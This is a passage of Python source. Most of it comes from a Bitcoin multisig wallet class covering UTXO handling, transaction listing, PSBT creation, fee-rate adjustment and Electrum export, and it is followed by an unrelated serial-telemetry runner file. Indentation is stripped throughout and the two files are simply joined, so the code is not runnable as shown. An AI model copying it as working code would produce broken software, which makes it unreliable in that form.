if "key" in wallet_dict:
new_dict["keys"] = [wallet_dict["key"]]
del new_dict["key"]
old_format_detected = True
if "device" in wallet_dict:
new_dict["devices"] = [wallet_dict["device"]]
del new_dict["device"]
old_format_detected = True
devices = [
device_manager.get_by_alias(device) for device in new_dict["devices"]
]
if (
len(new_dict["keys"]) > 1
and "sortedmulti" not in new_dict["recv_descriptor"]
):
new_dict["recv_descriptor"] = AddChecksum(
new_dict["recv_descriptor"]
.replace("multi", "sortedmulti")
.split("#")[0]
)
old_format_detected = True
if (
len(new_dict["keys"]) > 1
and "sortedmulti" not in new_dict["change_descriptor"]
):
new_dict["change_descriptor"] = AddChecksum(
new_dict["change_descriptor"]
.replace("multi", "sortedmulti")
.split("#")[0]
)
old_format_detected = True
if None in devices:
devices = [
(
(device["name"] if isinstance(device, dict) else device)
if (device["name"] if isinstance(device, dict) else device)
in device_manager.devices
else None
)
for device in new_dict["devices"]
]
if None in devices:
logger.error("A device used by this wallet could not have been found!")
return
else:
new_dict["devices"] = [
device_manager.devices[device].alias for device in devices
]
old_format_detected = True
new_dict["old_format_detected"] = old_format_detected
return new_dict
@classmethod
def from_json(
cls, wallet_dict, device_manager, manager, default_alias="", default_fullpath=""
):
name = wallet_dict.get("name", "")
alias = wallet_dict.get("alias", default_alias)
description = wallet_dict.get("description", "")
address = wallet_dict.get("address", "")
address_index = wallet_dict.get("address_index", 0)
change_address = wallet_dict.get("change_address", "")
change_index = wallet_dict.get("change_index", 0)
keypool = wallet_dict.get("keypool", 0)
change_keypool = wallet_dict.get("change_keypool", 0)
sigs_required = wallet_dict.get("sigs_required", 1)
pending_psbts = wallet_dict.get("pending_psbts", {})
fullpath = wallet_dict.get("fullpath", default_fullpath)
last_block = wallet_dict.get("last_block", None)
wallet_dict = Wallet.parse_old_format(wallet_dict, device_manager)
try:
address_type = wallet_dict["address_type"]
recv_descriptor = wallet_dict["recv_descriptor"]
change_descriptor = wallet_dict["change_descriptor"]
keys = [Key.from_json(key_dict) for key_dict in wallet_dict["keys"]]
devices = wallet_dict["devices"]
except:
logger.error("Could not construct a Wallet object from the data provided.")
return
return cls(
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=wallet_dict["old_format_detected"],
last_block=last_block,
)
def get_info(self):
try:
self.info = self.rpc.getwalletinfo()
except Exception:
self.info = {}
return self.info
def check_utxo(self):
try:
utxo = self.rpc.listunspent(0)
# list only the ones we know (have descriptor for it)
utxo = [tx for tx in utxo if tx.get("desc", "")]
for tx in utxo:
tx_data = self.gettransaction(tx["txid"], 0)
tx["time"] = tx_data["time"]
tx["category"] = "send"
try:
# get category from the descriptor - recv or change
idx = tx["desc"].split("[")[1].split("]")[0].split("/")[-2]
if idx == "0":
tx["category"] = "receive"
except:
pass
self.utxo = sorted(utxo, key=lambda utxo: utxo["time"], reverse=True)
except Exception as e:
logger.error(f"Failed to load utxos, {e}")
self.utxo = []
def getdata(self):
self.fetch_transactions()
self.check_utxo()
self.get_info()
# TODO: Should do the same for the non change address (?)
# check if address was used already
try:
value_on_address = self.rpc.getreceivedbyaddress(self.change_address, 0)
except:
# Could happen if address not in wallet (wallet was imported)
# try adding keypool
logger.info(
f"Didn't get transactions on address {self.change_address}. Refilling keypool."
)
self.keypoolrefill(0, end=self.keypool, change=False)
self.keypoolrefill(0, end=self.change_keypool, change=True)
value_on_address = 0
# if not - just return
if value_on_address > 0:
self.change_index += 1
self.getnewaddress(change=True)
@property
def json(self):
return self.to_json()
def to_json(self, for_export=False):
o = {
"name": self.name,
"alias": self.alias,
"description": self.description,
"address_type": self.address_type,
"address": self.address,
"address_index": self.address_index,
"change_address": self.change_address,
"change_index": self.change_index,
"keypool": self.keypool,
"change_keypool": self.change_keypool,
"recv_descriptor": self.recv_descriptor,
"change_descriptor": self.change_descriptor,
"keys": [key.json for key in self.keys],
"devices": [device.alias for device in self.devices],
"sigs_required": self.sigs_required,
"blockheight": self.blockheight,
}
if for_export:
o["labels"] = self.export_labels()
else:
o["pending_psbts"] = self.pending_psbts
o["last_block"] = self.last_block
return o
def save_to_file(self):
write_json_file(self.to_json(), self.fullpath)
self.manager.update()
def delete_files(self):
delete_file(self.fullpath)
delete_file(self.fullpath + ".bkp")
delete_file(self._addresses.path)
delete_file(self._transactions.path)
@property
def is_multisig(self):
return len(self.keys) > 1
@property
def locked_amount(self):
amount = 0
for psbt in self.pending_psbts:
amount += sum(
[
utxo["witness_utxo"]["amount"]
for utxo in self.pending_psbts[psbt]["inputs"]
]
)
return amount
def delete_pending_psbt(self, txid):
try:
self.rpc.lockunspent(True, self.pending_psbts[txid]["tx"]["vin"])
except:
# UTXO was spent
pass
if txid in self.pending_psbts:
del self.pending_psbts[txid]
self.save_to_file()
def update_pending_psbt(self, psbt, txid, raw):
if txid in self.pending_psbts:
self.pending_psbts[txid]["base64"] = psbt
decodedpsbt = self.rpc.decodepsbt(psbt)
signed_devices = self.get_signed_devices(decodedpsbt)
self.pending_psbts[txid]["devices_signed"] = [
dev.alias for dev in signed_devices
]
if "hex" in raw:
self.pending_psbts[txid]["sigs_count"] = self.sigs_required
self.pending_psbts[txid]["raw"] = raw["hex"]
else:
self.pending_psbts[txid]["sigs_count"] = len(signed_devices)
self.save_to_file()
return self.pending_psbts[txid]
else:
raise SpecterError("Can't find pending PSBT with this txid")
def save_pending_psbt(self, psbt):
self.pending_psbts[psbt["tx"]["txid"]] = psbt
try:
self.rpc.lockunspent(False, psbt["tx"]["vin"])
except:
logger.debug(
"Failed to lock UTXO for transaction, might be fine if the transaction is an RBF."
)
self.save_to_file()
def txlist(
self,
fetch_transactions=True,
validate_merkle_proofs=False,
current_blockheight=None,
):
"""Returns a list of all transactions in the wallet's CSV cache - processed with information to display in the UI in the transactions list
#Parameters:
# fetch_transactions (bool): Update the TxList CSV caching by fetching transactions from the Bitcoin RPC
# validate_merkle_proofs (bool): Return transactions with validated_blockhash
# current_blockheight (int): Current blockheight for calculating confirmations number (None will fetch the block count from the RPC)
"""
if fetch_transactions:
self.fetch_transactions()
try:
_transactions = [tx.__dict__().copy() for tx in self._transactions.values()]
transactions = sorted(
_transactions, key=lambda tx: tx["time"], reverse=True
)
transactions = [
tx
for tx in transactions
if (
not tx["conflicts"]
or max(
[
self.gettransaction(conflicting_tx, 0)["time"]
for conflicting_tx in tx["conflicts"]
]
)
< tx["time"]
)
]
if not current_blockheight:
current_blockheight = self.rpc.getblockcount()
result = []
blocks = {}
for tx in transactions:
if not tx.get("blockheight", 0):
tx["confirmations"] = 0
else:
tx["confirmations"] = current_blockheight - tx["blockheight"] + 1
raw_tx = decoderawtransaction(tx["hex"], self.manager.chain)
tx["vsize"] = raw_tx["vsize"]
if (
tx.get("confirmations") == 0
and tx.get("bip125-replaceable", "no") == "yes"
):
tx["fee"] = self.rpc.gettransaction(tx["txid"]).get("fee", 1)
category = ""
addresses = []
amounts = {}
inputs_mine_count = 0
for vin in raw_tx["vin"]:
# coinbase tx
if (
vin["txid"]
== "0000000000000000000000000000000000000000000000000000000000000000"
):
if tx["confirmations"] <= 100:
category = "immature"
else:
category = "generate"
break
if vin["txid"] in self._transactions:
try:
address = decoderawtransaction(
self._transactions[vin["txid"]]["hex"],
self.manager.chain,
)["vout"][vin["vout"]]["addresses"][0]
address_info = self.get_address_info(address)
if address_info and not address_info.is_external:
inputs_mine_count += 1
except Exception:
continue
outputs_mine_count = 0
for out in raw_tx["vout"]:
try:
address = out["addresses"][0]
except Exception:
# couldn't get address...
continue
address_info = self.get_address_info(address)
if address_info and not address_info.is_external:
outputs_mine_count += 1
addresses.append(address)
amounts[address] = out["value"]
if inputs_mine_count:
if outputs_mine_count and (
len(
[
address
for address in addresses
if self.get_address_info(address)
and not self.get_address_info(address).change
]
)
> 0
):
category = "selftransfer"
addresses = [
address
for address in addresses
if self.get_address_info(address)
and not self.get_address_info(address).change
]
elif outputs_mine_count and (
len(
[
address
for address in addresses
if self.get_address_info(address)
and self.get_address_info(address).change
]
)
> 1
or len(raw_tx["vout"]) == 1
):
category = "selftransfer"
addresses = [
address
for address in addresses
if self.get_address_info(address)
]
else:
category = "send"
addresses = [
address
for address in addresses
if not self.get_address_info(address)
or self.get_address_info(address).is_external
]
else:
if not category:
category = "receive"
addresses = [
address
for address in addresses
if self.get_address_info(address)
and not self.get_address_info(address).is_external
]
amounts = [amounts[address] for address in addresses]
if len(addresses) == 1:
addresses = addresses[0]
amounts = amounts[0]
tx["label"] = self.getlabel(addresses)
else:
tx["label"] = [self.getlabel(address) for address in addresses]
tx["category"] = category
tx["address"] = addresses
tx["amount"] = amounts
if len(addresses) == 0:
tx["ismine"] = False
else:
tx["ismine"] = True
# TODO: validate for unique txids only
tx["validated_blockhash"] = "" # default is assume unvalidated
if validate_merkle_proofs is True and tx["confirmations"] > 0:
proof_hex = self.rpc.gettxoutproof([tx["txid"]], tx["blockhash"])
logger.debug(
f"Attempting merkle proof validation of tx { tx['txid'] } in block { tx['blockhash'] }"
)
if is_valid_merkle_proof(
proof_hex=proof_hex,
target_tx_hex=tx["txid"],
target_block_hash_hex=tx["blockhash"],
target_merkle_root_hex=None,
):
# NOTE: this does NOT guarantee this blockhash is actually in the real Bitcoin blockchain!
# See merkletooltip.html for details
logger.debug(
f"Merkle proof of { tx['txid'] } validation success"
)
tx["validated_blockhash"] = tx["blockhash"]
else:
logger.warning(
f"Attempted merkle proof validation on {tx['txid']} but failed. This is likely a configuration error but perhaps your node is compromised! Details: {proof_hex}"
)
result.append(tx)
return result
except Exception as e:
logging.error("Exception while processing txlist: {}".format(e))
return []
def gettransaction(self, txid, blockheight=None):
try:
return self._transactions.gettransaction(txid, blockheight)
except Exception as e:
logger.warning("Could not get transaction {}, error: {}".format(txid, e))
def rescanutxo(self, explorer=None):
t = threading.Thread(target=self._rescan_utxo_thread, args=(explorer,))
t.start()
def export_labels(self):
return self._addresses.get_labels()
def import_labels(self, labels):
# format:
# {
# 'label1': ['address1', 'address2'],
# 'label2': ['address3', 'address4']
# }
#
for label, addresses in labels.items():
if not label:
continue
for address in addresses:
self._addresses.set_label(address, label)
def _rescan_utxo_thread(self, explorer=None):
# rescan utxo is pretty fast,
# so we can check large range of addresses
# and adjust keypool accordingly
args = [
"start",
[
{"desc": self.recv_descriptor, "range": max(self.keypool, 1000)},
{
"desc": self.change_descriptor,
"range": max(self.change_keypool, 1000),
},
],
]
unspents = self.rpc.scantxoutset(*args)["unspents"]
# if keypool adjustment fails - not a big deal
try:
# check derivation indexes in found unspents (last 2 indexes in [brackets])
derivations = [
tx["desc"].split("[")[1].split("]")[0].split("/")[-2:]
for tx in unspents
]
# get max derivation for change and receive branches
max_recv = max([-1] + [int(der[1]) for der in derivations if der[0] == "0"])
max_change = max(
[-1] + [int(der[1]) for der in derivations if der[0] == "1"]
)
updated = False
if max_recv >= self.address_index:
# skip to max_recv
self.address_index = max_recv
# get next
self.getnewaddress(change=False, save=False)
updated = True
while max_change >= self.change_index:
# skip to max_change
self.change_index = max_change
# get next
self.getnewaddress(change=True, save=False)
updated = True
# save only if needed
if updated:
self.save_to_file()
except Exception as e:
logger.warning(f"Failed to get derivation path from utxo transaction: {e}")
# keep working with unspents
res = self.rpc.multi([("getblockhash", tx["height"]) for tx in unspents])
block_hashes = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["blockhash"] = block_hashes[i]
res = self.rpc.multi(
[("gettxoutproof", [tx["txid"]], tx["blockhash"]) for tx in unspents]
)
proofs = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["proof"] = proofs[i]
res = self.rpc.multi(
[
("getrawtransaction", tx["txid"], False, tx["blockhash"])
for tx in unspents
]
)
raws = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["raw"] = raws[i]
missing = [tx for tx in unspents if tx["raw"] is None]
existing = [tx for tx in unspents if tx["raw"] is not None]
self.rpc.multi(
[("importprunedfunds", tx["raw"], tx["proof"]) for tx in existing]
)
# handle missing transactions now
# if Tor is running, requests will be sent over Tor
if explorer is not None:
try:
requests_session = requests.Session()
requests_session.proxies["http"] = "socks5h://localhost:9050"
requests_session.proxies["https"] = "socks5h://localhost:9050"
requests_session.get(explorer)
except Exception:
requests_session = requests.Session()
# make sure there is no trailing /
explorer = explorer.rstrip("/")
try:
# get raw transactions
raws = [
requests_session.get(f"{explorer}/api/tx/{tx['txid']}/hex").text
for tx in missing
]
# get proofs
proofs = [
requests_session.get(
f"{explorer}/api/tx/{tx['txid']}/merkleblock-proof"
).text
for tx in missing
]
# import funds
self.rpc.multi(
[
("importprunedfunds", raws[i], proofs[i])
for i in range(len(raws))
]
)
except Exception as e:
logger.warning(f"Failed to fetch data from block explorer: {e}")
self.check_addresses()
@property
def rescan_progress(self):
"""Returns None if rescanblockchain is not launched,
value between 0 and 1 otherwise
"""
if self.info.get("scanning", False) == False:
return None
else:
return self.info["scanning"]["progress"]
@property
def blockheight(self):
txs = self.rpc.listtransactions("*", 100, 0, True)
i = 0
while len(txs) == 100:
i += 1
next_txs = self.rpc.listtransactions("*", 100, i * 100, True)
if len(next_txs) > 0:
txs = next_txs
else:
break
try:
if len(txs) > 0 and "blockheight" in txs[0]:
blockheight = (
txs[0]["blockheight"] - 101
) # To ensure coinbase transactions are indexed properly
return (
0 if blockheight < 0 else blockheight
) # To ensure regtest don't have negative blockheight
except:
pass
return 481824 if self.manager.chain == "main" else 0
@property
def account_map(self):
return (
'{ "label": "'
+ self.name.replace("'", "\\'")
+ '", "blockheight": '
+ str(self.blockheight)
+ ', "descriptor": "'
+ self.recv_descriptor.replace("/", "\\/")
+ '" }'
)
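# Illustrative shape of the string built above (all values are placeholders):
#   { "label": "My Wallet", "blockheight": 481824, "descriptor": "wpkh([fingerprint\/84h\/0h\/0h]xpub...\/0\/*)#checksum" }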
def getnewaddress(self, change=False, save=True):
if change:
self.change_index += 1
index = self.change_index
else:
self.address_index += 1
index = self.address_index
address = self.get_address(index, change=change)
if change:
self.change_address = address
else:
self.address = address
if save:
self.save_to_file()
return address
def get_address(self, index, change=False, check_keypool=True):
if check_keypool:
pool = self.change_keypool if change else self.keypool
if pool < index + self.GAP_LIMIT:
self.keypoolrefill(pool, index + self.GAP_LIMIT, change=change)
desc = self.change_descriptor if change else self.recv_descriptor
return Descriptor.parse(desc).address(index, self.manager.chain)
def get_descriptor(self, index=None, change=False, address=None):
"""
Returns address descriptor from index, change
or from address belonging to the wallet.
"""
if address is not None:
# only ask rpc if address is not known directly
if address not in self._addresses:
return self.rpc.getaddressinfo(address).get("desc", "")
else:
a = self._addresses[address]
index = a.index
change = a.change
if index is None:
index = self.change_index if change else self.address_index
desc = self.change_descriptor if change else self.recv_descriptor
derived_desc = Descriptor.parse(desc).derive(index).serialize()
derived_desc_xpubs = (
Descriptor.parse(desc).derive(index, keep_xpubs=True).serialize()
)
return {"descriptor": derived_desc, "xpubs_descriptor": derived_desc_xpubs}
def get_address_info(self, address):
try:
return self._addresses[address]
except:
return None
def get_electrum_file(self):
""" Exports the wallet data as Electrum JSON format """
electrum_devices = [
"bitbox02",
"coldcard",
"digitalbitbox",
"keepkey",
"ledger",
"safe_t",
"trezor",
]
if len(self.keys) == 1:
# Single-sig case:
key = self.keys[0]
if self.devices[0].device_type in electrum_devices:
return {
"keystore": {
"ckcc_xpub": key.xpub,
"derivation": key.derivation.replace("h", "'"),
"root_fingerprint": key.fingerprint,
"hw_type": self.devices[0].device_type,
"label": self.devices[0].name,
"type": "hardware",
"soft_device_id": None,
"xpub": key.original,
},
"wallet_type": "standard",
}
else:
return {
"keystore": {
"derivation": key.derivation.replace("h", "'"),
"root_fingerprint": key.fingerprint,
"type": "bip32",
"xprv": None,
"xpub": key.original,
},
"wallet_type": "standard",
}
# Multisig case
to_return = {"wallet_type": "{}of{}".format(self.sigs_required, len(self.keys))}
for cnt, device in enumerate(self.devices):
key = [key for key in device.keys if key in self.keys][0]
if device.device_type in electrum_devices:
to_return["x{}/".format(cnt + 1)] = {
"ckcc_xpub": key.xpub,
"derivation": key.derivation.replace("h", "'"),
"root_fingerprint": key.fingerprint,
"hw_type": device.device_type,
"label": device.name,
"type": "hardware",
"soft_device_id": None,
"xpub": key.original,
}
else:
to_return["x{}/".format(cnt + 1)] = {
"derivation": key.derivation.replace("h", "'"),
"root_fingerprint": key.fingerprint,
"type": "bip32",
"xprv": None,
"xpub": key.original,
}
return to_return
def get_balance(self):
try:
balance = self.rpc.getbalances()["watchonly"]
# calculate available balance
locked_utxo = self.rpc.listlockunspent()
available = {}
available.update(balance)
for tx in locked_utxo:
tx_data = self.gettransaction(tx["txid"])
raw_tx = decoderawtransaction(tx_data["hex"], self.manager.chain)
delta = raw_tx["vout"][tx["vout"]]["value"]
if "confirmations" not in tx_data or tx_data["confirmations"] == 0:
available["untrusted_pending"] -= delta
else:
available["trusted"] -= delta
available["trusted"] = round(available["trusted"], 8)
available["untrusted_pending"] = round(available["untrusted_pending"], 8)
balance["available"] = available
except:
balance = {
"trusted": 0,
"untrusted_pending": 0,
"available": {"trusted": 0, "untrusted_pending": 0},
}
self.balance = balance
return self.balance
def keypoolrefill(self, start, end=None, change=False):
if end is None:
end = start + self.GAP_LIMIT
desc = self.recv_descriptor if not change else self.change_descriptor
args = [
{
"desc": desc,
"internal": change,
"range": [start, end],
"timestamp": "now",
"keypool": True,
"watchonly": True,
}
]
addresses = [
dict(
address=self.get_address(idx, change=change, check_keypool=False),
index=idx,
change=change,
)
for idx in range(start, end)
]
self._addresses.add(addresses, check_rpc=False)
if not self.is_multisig:
r = self.rpc.importmulti(args, {"rescan": False})
# bip67 requires sorted public keys for multisig addresses
else:
# try if sortedmulti is supported
r = self.rpc.importmulti(args, {"rescan": False})
# doesn't raise, but instead returns "success": False
if not r[0]["success"]:
# first import normal multi
# remove checksum
desc = desc.split("#")[0]
# switch to multi
desc = desc.replace("sortedmulti", "multi")
# add checksum
desc = AddChecksum(desc)
# update descriptor
args[0]["desc"] = desc
r = self.rpc.importmulti(args, {"rescan": False})
# make a batch of single addresses to import
arg = args[0]
# remove range key
arg.pop("range")
batch = []
for i in range(start, end):
sorted_desc = sort_descriptor(desc, index=i)
# create fresh object
obj = {}
obj.update(arg)
obj.update({"desc": sorted_desc})
batch.append(obj)
r = self.rpc.importmulti(batch, {"rescan": False})
if change:
self.change_keypool = end
else:
self.keypool = end
self.save_to_file()
return end
def setlabel(self, address, label):
self._addresses.set_label(address, label)
def getlabel(self, address):
if address in self._addresses:
return self._addresses[address].label
else:
return address
def getlabels(self, addresses):
labels = {}
for addr in addresses:
labels[addr] = self.getlabel(addr)
return labels
def get_address_name(self, address, addr_idx):
# TODO: remove
return self.getlabel(address)
@property
def fullbalance(self):
balance = self.balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def available_balance(self):
return self.balance["available"]
@property
def full_available_balance(self):
balance = self.available_balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def addresses(self):
return [self.get_address(idx) for idx in range(0, self.address_index + 1)]
@property
def change_addresses(self):
return [
self.get_address(idx, change=True)
for idx in range(0, self.change_index + 1)
]
@property
def wallet_addresses(self):
return self.addresses + self.change_addresses
def createpsbt(
self,
addresses: [str],
amounts: [float],
subtract: bool = False,
subtract_from: int = 0,
fee_rate: float = 1.0,
selected_coins=[],
readonly=False,
rbf=True,
existing_psbt=None,
):
"""
fee_rate: in sat/B or BTC/kB. If set to 0 Bitcoin Core sets feeRate automatically.
"""
if fee_rate > 0 and fee_rate < self.MIN_FEE_RATE:
fee_rate = self.MIN_FEE_RATE
options = {"includeWatching": True, "replaceable": rbf}
extra_inputs = []
if not existing_psbt:
if self.full_available_balance < sum(amounts):
raise SpecterError(
"The wallet does not have sufficient funds to make the transaction."
)
if self.available_balance["trusted"] <= sum(amounts):
txlist = self.rpc.listunspent(0, 0)
b = sum(amounts) - self.available_balance["trusted"]
for tx in txlist:
extra_inputs.append({"txid": tx["txid"], "vout": tx["vout"]})
b -= tx["amount"]
if b < 0:
break
elif selected_coins != []:
still_needed = sum(amounts)
for coin in selected_coins:
coin_txid = coin.split(",")[0]
coin_vout = int(coin.split(",")[1])
coin_amount = float(coin.split(",")[2])
extra_inputs.append({"txid": coin_txid, "vout": coin_vout})
still_needed -= coin_amount
if still_needed < 0:
break
if still_needed > 0:
raise SpecterError(
"Selected coins does not cover Full amount! Please select more coins!"
)
# subtract fee from amount of this output:
# currently only one address is supported, so either
# empty array (subtract from change) or [0]
subtract_arr = [subtract_from] if subtract else []
options = {
"includeWatching": True,
"changeAddress": self.change_address,
"subtractFeeFromOutputs": subtract_arr,
"replaceable": rbf,
}
if fee_rate > 0:
# bitcoin core needs us to convert sat/B to BTC/kB
options["feeRate"] = round((fee_rate * 1000) / 1e8, 8)
# don't reuse change addresses - use getrawchangeaddress instead
r = self.rpc.walletcreatefundedpsbt(
extra_inputs, # inputs
[{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
0, # locktime
options, # options
True, # bip32-der
)
b64psbt = r["psbt"]
psbt = self.rpc.decodepsbt(b64psbt)
else:
psbt = existing_psbt
extra_inputs = [
{"txid": tx["txid"], "vout": tx["vout"]} for tx in psbt["tx"]["vin"]
]
if "changeAddress" in psbt:
options["changeAddress"] = psbt["changeAddress"]
if "base64" in psbt:
b64psbt = psbt["base64"]
if fee_rate > 0.0:
if not existing_psbt:
psbt_fees_sats = int(psbt["fee"] * 1e8)
# estimate final size: add weight of inputs
tx_full_size = ceil(
psbt["tx"]["vsize"]
+ len(psbt["inputs"]) * self.weight_per_input / 4
)
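# The PSBT above was funded while unsigned, so both the rate Core achieved
# (psbt_fees_sats / vsize) and the unsigned vsize underestimate the final,
# signed transaction. The adjustment below rescales the requested rate by the
# requested/achieved ratio and by the expected size growth from adding
# signatures (weight_per_input / 4 vbytes per input).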
adjusted_fee_rate = (
fee_rate
* (fee_rate / (psbt_fees_sats / psbt["tx"]["vsize"]))
* (tx_full_size / psbt["tx"]["vsize"])
)
options["feeRate"] = "%.8f" % round((adjusted_fee_rate * 1000) / 1e8, 8)
else:
options["feeRate"] = "%.8f" % round((fee_rate * 1000) / 1e8, 8)
r = self.rpc.walletcreatefundedpsbt(
extra_inputs, # inputs
[{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
0, # locktime
options, # options
True, # bip32-der
)
b64psbt = r["psbt"]
psbt = self.rpc.decodepsbt(b64psbt)
psbt["fee_rate"] = options["feeRate"]
# estimate full size
tx_full_size = ceil(
psbt["tx"]["vsize"] + len(psbt["inputs"]) * self.weight_per_input / 4
)
psbt["tx_full_size"] = tx_full_size
psbt["base64"] = b64psbt
psbt["amount"] = amounts
psbt["address"] = addresses
psbt["time"] = time.time()
psbt["sigs_count"] = 0
if not readonly:
self.save_pending_psbt(psbt)
return psbt
def send_rbf_tx(self, txid, fee_rate):
raw_tx = self.gettransaction(txid)["hex"]
raw_psbt = self.rpc.utxoupdatepsbt(
self.rpc.converttopsbt(raw_tx, True),
[self.recv_descriptor, self.change_descriptor],
)
psbt = self.rpc.decodepsbt(raw_psbt)
psbt["changeAddress"] = [
vout["scriptPubKey"]["addresses"][0]
for i, vout in enumerate(psbt["tx"]["vout"])
if self.get_address_info(vout["scriptPubKey"]["addresses"][0])
and self.get_address_info(vout["scriptPubKey"]["addresses"][0]).change
]
if psbt["changeAddress"]:
psbt["changeAddress"] = psbt["changeAddress"][0]
else:
raise Exception("Cannot RBF a transaction with no change output")
return self.createpsbt(
addresses=[
vout["scriptPubKey"]["addresses"][0]
for i, vout in enumerate(psbt["tx"]["vout"])
if not self.get_address_info(vout["scriptPubKey"]["addresses"][0])
or not self.get_address_info(
vout["scriptPubKey"]["addresses"][0]
).change
],
amounts=[
vout["value"]
for i, vout in enumerate(psbt["tx"]["vout"])
if not self.get_address_info(vout["scriptPubKey"]["addresses"][0])
or not self.get_address_info(
vout["scriptPubKey"]["addresses"][0]
).change
],
fee_rate=fee_rate,
readonly=False,
rbf=True,
existing_psbt=psbt,
)
def fill_psbt(self, b64psbt, non_witness: bool = True, xpubs: bool = True):
psbt = PSBT()
psbt.deserialize(b64psbt)
if non_witness:
for i, inp in enumerate(psbt.tx.vin):
txid = inp.prevout.hash.to_bytes(32, "big").hex()
try:
res = self.gettransaction(txid)
stream = BytesIO(bytes.fromhex(res["hex"]))
prevtx = CTransaction()
prevtx.deserialize(stream)
psbt.inputs[i].non_witness_utxo = prevtx
except:
logger.error(
"Can't find previous transaction in the wallet. Signing might not be possible for certain devices..."
)
else:
# remove non_witness_utxo if we don't want them
for inp in psbt.inputs:
if inp.witness_utxo is not None:
inp.non_witness_utxo = None
if xpubs:
# for multisig add xpub fields
if len(self.keys) > 1:
for k in self.keys:
key = b"\x01" + decode_base58(k.xpub)
if k.fingerprint != "":
fingerprint = bytes.fromhex(k.fingerprint)
else:
fingerprint = get_xpub_fingerprint(k.xpub)
if k.derivation != "":
der = der_to_bytes(k.derivation)
else:
der = b""
value = fingerprint + der
psbt.unknown[key] = value
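# The b"\x01" prefix appears to be the PSBT_GLOBAL_XPUB key type from BIP 174;
# the value is the 4-byte master fingerprint followed by the serialized
# derivation path, which is the layout multisig signers expect.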
return psbt.serialize()
def get_signed_devices(self, decodedpsbt):
signed_devices = []
# check who already signed
for i, key in enumerate(self.keys):
sigs = 0
for inp in decodedpsbt["inputs"]:
if "bip32_derivs" not in inp:
# how are we going to sign it???
break
if "partial_signatures" not in inp:
# nothing to update - no signatures for this input
break
for der in inp["bip32_derivs"]:
if der["master_fingerprint"] == key.fingerprint:
if der["pubkey"] in inp["partial_signatures"]:
sigs += 1
# ok we have all signatures from this key (device)
if sigs >= len(decodedpsbt["inputs"]):
# assuming that order of self.devices and self.keys is the same
signed_devices.append(self.devices[i])
return signed_devices
def importpsbt(self, b64psbt):
# TODO: check maybe some of the inputs are already locked
psbt = self.rpc.decodepsbt(b64psbt)
psbt["base64"] = b64psbt
amount = []
address = []
# get output address and amount
for out in psbt["tx"]["vout"]:
if (
"addresses" not in out["scriptPubKey"]
or len(out["scriptPubKey"]["addresses"]) == 0
):
# TODO: we need to handle it somehow differently
raise SpecterError("Sending to raw scripts is not supported yet")
addr = out["scriptPubKey"]["addresses"][0]
info = self.get_address_info(addr)
# check if it's a change
if info and info.change:
continue
address.append(addr)
amount.append(out["value"])
psbt = self.createpsbt(
addresses=address,
amounts=amount,
fee_rate=0.0,
readonly=False,
existing_psbt=psbt,
)
signed_devices = self.get_signed_devices(psbt)
psbt["devices_signed"] = [dev.alias for dev in signed_devices]
psbt["sigs_count"] = len(signed_devices)
raw = self.rpc.finalizepsbt(b64psbt)
if "hex" in raw:
psbt["raw"] = raw["hex"]
return psbt
@property
def weight_per_input(self):
"""Calculates the weight of a signed input"""
if self.is_multisig:
input_size = 3 # OP_M OP_N ... OP_CHECKMULTISIG
# pubkeys
input_size += 34 * len(self.keys)
# signatures
input_size += 75 * self.sigs_required
if not self.recv_descriptor.startswith("wsh"):
# P2SH scriptsig: 22 00 20 <32-byte-hash>
input_size += 35 * 4
return input_size
# else: single-sig
if self.recv_descriptor.startswith("wpkh"):
# pubkey, signature
return 75 + 34
# pubkey, signature, 4* P2SH: 16 00 14 20-byte-hash
return 75 + 34 + 23 * 4
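# Worked examples of weight_per_input as computed above (illustrative only):
#   2-of-3 wsh multisig:     3 + 34*3 + 75*2 = 255 weight units per input
#   2-of-3 sh-wsh multisig:  255 + 35*4      = 395 weight units per input
#   single-sig wpkh:         75 + 34         = 109 weight units per input
#   single-sig sh-wpkh:      75 + 34 + 23*4  = 201 weight units per input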
|
runner.py
|
import threading
import time
# Main class
class Runner:
def __init__(self, transport, telemetry, plots, plotsLock, topics):
self.transport = transport
self.telemetryWrapper = telemetry
self.plots = plots
self.plotsLock = plotsLock
self.topics = topics
self.thread = None
self.running = threading.Event()
self.running.set()
self.connected = threading.Event()
self.connected.clear()
self.resetStats()
def connect(self,port,bauds):
# Create monitoring topics
self.topics.create("baudspeed",source="cli")
self.topics.create("baudspeed_avg",source="cli")
self.topics.create("rx_in_waiting",source="cli")
self.topics.create("rx_in_waiting_max",source="cli")
self.topics.create("rx_in_waiting_avg",source="cli")
# Connection options
options = dict()
options['port'] = port
options['baudrate'] = bauds
self.baudrate = bauds
self.transport.connect(options)
self._start_thread()
def _start_thread(self):
self.connected.set()
self.thread = threading.Thread(target=self.run)
self.thread.start()
def disconnect(self):
self.connected.clear()
self.transport.disconnect()
def terminate(self):
self.running.clear()
if self.thread:
self.thread.join()
try:
self.transport.disconnect()
except:
pass # Already disconnected
def stats(self):
return {
"baudspeed" : self.baudspeed,
"baudspeed_avg" : self.baudspeed_avg,
"baudratio" : self.baudspeed / self.baudrate,
"baudratio_avg" : self.baudspeed_avg / self.baudrate
}
def resetStats(self):
self.baudrate = 1.0
self.baudspeed = 0.0
self.lasttime = time.time()
self.lastamount = 0.0
self.baudspeed_avg = 0.0
def update(self):
# Update protocol decoding
self.telemetryWrapper.update()
# Protect the self.plots data structure from
# being modified from the main thread
self.plotsLock.acquire()
# Poll each poll pipe to see if user closed them
plotToDelete = None
for i, p in enumerate(self.plots):
if p['ctrl'].poll():
if p['ctrl'].recv() == "closing":
plotToDelete = i
break
# Delete a plot if needed
if plotToDelete is not None:
self.plots[plotToDelete]['ctrl'].close()
topic = self.plots[plotToDelete]['topic']
self.topics.untransfer(topic)
self.plots.pop(plotToDelete)
self.plotsLock.release()
def computeStats(self):
current = time.time()
difft = current - self.lasttime
if difft > 0.05 :
self.lasttime = current
measures = self.transport.stats()
diff = measures['rx_bytes'] - self.lastamount
self.lastamount = measures['rx_bytes']
self.baudspeed = diff / difft
